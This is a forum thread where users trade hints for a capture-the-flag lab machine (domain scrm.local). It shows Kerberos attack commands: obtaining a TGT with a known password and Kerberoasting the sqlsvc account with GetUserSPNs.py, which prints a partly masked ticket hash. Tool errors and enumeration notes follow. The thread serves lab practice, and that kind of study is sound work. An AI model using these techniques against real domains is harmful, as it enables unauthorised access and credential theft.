Return to forum

mimikatz · June 11, 2022 at 11:58 PM

LOGON;username=ksimpson&password=ksimpson
ERROR_INVALID_CREDENTIALS;

Not sure if this does anything but you can add ;

I tried several variations with no luck. No luck on smb or psexec, and no luck using win-rm. Unsure if 5895 is a web server or not.

thomasratkos · June 12, 2022 at 3:42 AM

get ksimpsons TGT:

getTGT "kerberos+pass://scrm.local\ksimpson:[email protected]" krb_ccache

use kerberos login to get sqlsvc TGS for cracking:

GetUserSPNs.py -dc-ip dc1.scrm.local scrm.local/sqlsvc -request -k -no-pass

ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
---------------------------- ------ -------- -------------------------- -------------------------- ----------
MSSQLSvc/dc1.scrm.local:1433 sqlsvc 2021-11-03 12:32:02.351452 2022-06-11 21:41:15.566050
MSSQLSvc/dc1.scrm.local sqlsvc 2021-11-03 12:32:02.351452 2022-06-11 21:41:15.566050

$krb5tgs$23$*sqlsvc$SCRM.LOCAL$scrm.local/sqlsvc*$488b33086784ae1b2e7ebdad2f41bb3a$9a0f4e9da2d5f77a032388a6e1f9b25aeaac92ec33e782fc0afb7246d79bea39e2e2271bb484cf0c7f000200f3032c13c71bb8899ecb5cd2679619c258d67c7d1438569daa8133854f69e3c030de5f2bd20387eaca43438eead34c1dbf751aa9b9b2269b0e232a043f5cc3f59ac1026d132c09416e6e549773f60288975f62ec0507110d004437d0462e325038f9d5cb5844db29404694fed9e1f23f990a7d5203e8811f781033baf3c1ea54XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

skyweasel · June 12, 2022 at 4:16 AM

(June 12, 2022, 03:42 AM)thomasratkos Wrote: get ksimpsons TGT:

getTGT "kerberos+pass://scrm.local\ksimpson:[email protected]" krb_ccache

use kerberos login to get sqlsvc TGS for cracking:

GetUserSPNs.py -dc-ip dc1.scrm.local scrm.local/sqlsvc -request -k -no-pass

ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
---------------------------- ------ -------- -------------------------- -------------------------- ----------
MSSQLSvc/dc1.scrm.local:1433 sqlsvc 2021-11-03 12:32:02.351452 2022-06-11 21:41:15.566050
MSSQLSvc/dc1.scrm.local sqlsvc 2021-11-03 12:32:02.351452 2022-06-11 21:41:15.566050

$krb5tgs$23$*sqlsvc$SCRM.LOCAL$scrm.local/sqlsvc*$488b33086784ae1b2e7ebdad2f41bb3a$9a0f4e9da2d5f77a032388a6e1f9b25aeaac92ec33e782fc0afb7246d79bea39e2e2271bb484cf0c7f000200f3032c13c71bb8899ecb5cd2679619c258d67c7d1438569daa8133854f69e3c030de5f2bd20387eaca43438eead34c1dbf751aa9b9b2269b0e232a043f5cc3f59ac1026d132c09416e6e549773f60288975f62ec0507110d004437d0462e325038f9d5cb5844db29404694fed9e1f23f990a7d5203e8811f781033baf3c1ea54XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

Cheers for thi post/nudge.

I keep getting "[-] exceptions must derive from BaseException" from GetUserSPNs.py

annoying.

care to paste the full tgs?

bigdare · June 12, 2022 at 4:21 AM

(June 12, 2022, 04:16 AM)skyweasel Wrote:
(June 12, 2022, 03:42 AM)thomasratkos Wrote: get ksimpsons TGT:

getTGT "kerberos+pass://scrm.local\ksimpson:[email protected]" krb_ccache

use kerberos login to get sqlsvc TGS for cracking:

GetUserSPNs.py -dc-ip dc1.scrm.local scrm.local/sqlsvc -request -k -no-pass

ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
---------------------------- ------ -------- -------------------------- -------------------------- ----------
MSSQLSvc/dc1.scrm.local:1433 sqlsvc 2021-11-03 12:32:02.351452 2022-06-11 21:41:15.566050
MSSQLSvc/dc1.scrm.local sqlsvc 2021-11-03 12:32:02.351452 2022-06-11 21:41:15.566050

$krb5tgs$23$*sqlsvc$SCRM.LOCAL$scrm.local/sqlsvc*$488b33086784ae1b2e7ebdad2f41bb3a$9a0f4e9da2d5f77a032388a6e1f9b25aeaac92ec33e782fc0afb7246d79bea39e2e2271bb484cf0c7f000200f3032c13c71bb8899ecb5cd2679619c258d67c7d1438569daa8133854f69e3c030de5f2bd20387eaca43438eead34c1dbf751aa9b9b2269b0e232a043f5cc3f59ac1026d132c09416e6e549773f60288975f62ec0507110d004437d0462e325038f9d5cb5844db29404694fed9e1f23f990a7d5203e8811f781033baf3c1ea54XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

Hmm I keep getting "[-] exceptions must derive from BaseException" from GetUserSPNs.py

annoying.

care to paste the full tgs?

getting the same error. The actual error appears to be something to do with it negotiating with SMB rather than Kerberos. Other impacket tools work with Kerberos auth like smbclient.py, smbexec.py, etc.

    if ans.isValidAnswer(STATUS_MORE_PROCESSING_REQUIRED):
  File "/usr/lib/python3/dist-packages/impacket/smb3structs.py", line 458, in isValidAnswer
    raise smb3.SessionError(self['Status'], self)
impacket.smb3.SessionError: SMB SessionError: STATUS_NOT_SUPPORTED(The request is not supported.)

thomasratkos · June 12, 2022 at 4:32 AM

(June 12, 2022, 04:16 AM)skyweasel Wrote: Cheers for thi post/nudge.

I keep getting "[-] exceptions must derive from BaseException" from GetUserSPNs.py

annoying.

care to paste the full tgs?

its a problem with the tool, not you.. do some google searching, you might find the creator of the box on github trying to get this issue fixed :D

i hit a wall after this so if anyone has a nudge after this lmk please 😎

vergun · June 12, 2022 at 5:08 AM

im at the same point. I think the sqlsvc is a bit useless

im fuzzing parameters in the 4411 port

bigdare · June 12, 2022 at 5:23 AM

(June 12, 2022, 05:08 AM)vergun Wrote: im at the same point. I think the sqlsvc is a bit useless

im fuzzing parameters in the 4411 port

I tried to get Bloodhound.py to work over Kerberos and generic LDAP auth - both failed for different reasons. Looks like bloodhound.py doesn't support regular auth in case of channel binding being mandatory:
https://github.com/fox-it/BloodHound.py/issues/55

And, because Kerberos auth implementation in bh.py is incomplete, even after proxying all the necessary A and SRV records with DNSChef, you still get errors and can't connect.

yemacaw863 · June 12, 2022 at 7:45 AM

(June 12, 2022, 04:32 AM)thomasratkos Wrote:
(June 12, 2022, 04:16 AM)skyweasel Wrote: Cheers for thi post/nudge.

I keep getting "[-] exceptions must derive from BaseException" from GetUserSPNs.py

annoying.

care to paste the full tgs?

its a problem with the tool, not you.. do some google searching, you might find the creator of the box on github trying to get this issue fixed :D

i hit a wall after this so if anyone has a nudge after this lmk please 😎

Thanks for the nudges!

Subsequently,
1. Found a "Network Security Changes.pdf" file by "IT Support" using smbclient.py under Public shares.. the following is the summary content:
"(Affects All) When you log on or access network resources you will now be using Kerberos authentication..."
"(Affects HR department) The attacker was able to retrieve credentials from an SQL database used by our HR software so we have removed all access to the SQL service for everyone apart from network administrators"

2. Able to run reg.py using both users to query the windows registry (different results).

And now.. I'm stuck again :(

@qwerty173 / @jon01 any nudge? :D

fironeDerbert · June 12, 2022 at 7:49 AM

There is an other user called "VbScrub" found using exiftool on this image

yemacaw863 · June 12, 2022 at 7:55 AM

(June 12, 2022, 07:49 AM)fironeDerbert Wrote: There is an other user called "VbScrub" found using exiftool on this image

VbScrub is the creator of this machine... And according to Kerberos, this is not a valid username..